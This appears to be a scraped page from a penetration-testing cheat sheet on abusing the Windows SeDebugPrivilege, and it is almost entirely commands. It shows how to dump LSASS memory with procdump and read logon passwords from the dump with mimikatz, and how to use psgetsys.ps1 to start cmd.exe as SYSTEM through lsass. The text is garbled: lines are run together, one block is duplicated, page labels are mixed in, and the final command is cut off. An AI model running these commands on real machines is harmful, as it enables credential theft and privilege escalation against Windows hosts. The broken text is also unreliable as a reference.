SeDebugPrivilege
ABOUT
Dumping LSASS
C:\> procdump.exe -accepteula -ma lsass.exe lsass.dmpC:\> mimikatz.exemimikatz # sekurlsa::minidump lsass.dmpmimikatz # sekurlsa::logonpasswordsRCE as SYSTEM
Last updated
C:\> procdump.exe -accepteula -ma lsass.exe lsass.dmpC:\> mimikatz.exemimikatz # sekurlsa::minidump lsass.dmpmimikatz # sekurlsa::logonpasswordsLast updated
PS:\> tasklist PS:\> .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(612, "c:\windows\System32\cmd.exe", "")PS:\> .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(Get-Process "lsass".Id, "c:\windows\System32\cmd.exe", ""cd C;